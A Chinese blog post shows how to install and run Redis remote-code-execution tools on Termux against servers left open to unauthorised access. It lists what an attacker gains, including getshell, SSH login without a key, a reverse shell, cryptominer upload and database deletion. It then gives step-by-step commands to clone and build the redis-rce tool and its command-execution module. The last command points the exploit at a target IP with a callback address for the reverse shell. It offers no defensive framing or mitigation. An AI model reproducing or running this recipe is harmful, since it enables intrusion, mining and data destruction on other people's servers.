本文作者:清夜

redis数据库漏洞利用工具

清夜 4个月前 ( 06-13 ) 33 抢沙发
redis数据库漏洞利用工具摘要: 漏洞项:未授权访问危害:写入木马getshell免密钥ssh登录反弹shell可上传挖坑木马任意操作数据库(可删除数据库)详情参照:https://blog.youngxq.cn/...

漏洞项:未授权访问

危害:

写入木马getshell

免密钥ssh登录

反弹shell

可上传挖坑木马

任意操作数据库(可删除数据库)

详情参照:https://blog.youngxq.cn/post/421.html

介绍方面上面的博文都写了,本文只介绍termux安装redis的漏洞利用工具。


前提:

termux中装有python3 以及 pip3


安装make

1. pkg install make 


克隆redis-rce

2. git clone https://github.com/Ridter/redis-rce.git


克隆RedisModules-ExecuteCommand

3. git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git


进入文件夹

4. cd RedisModules-ExecuteCommand/src


编译

5. make


复制文件

6. cp module.so ~/redis-rce


安装模块

7. pip3 install six


运行exp

8. python3 redis-rce.py -r 192.168.2.170 -p 6379 -L 127.0.0.1 -P 8989 -f module.so

注意:

-r参数是指远程Redis IP地址 -p是远程redis的端口 -L参数是指反弹到的服务器IP地址 -P是本地接受反弹的端口。

(注意大小写)

最好一张图正常运行。

文章版权及转载声明

作者:清夜本文地址:https://blog.youngxq.cn/post/420.html发布于 4个月前 ( 06-13 )
文章转载或复制请以超链接形式并注明出处清夜博客

阅读
分享

发表评论

快捷回复:

验证码

评论列表 (暂无评论,33人围观)参与讨论

还没有评论,来说两句吧...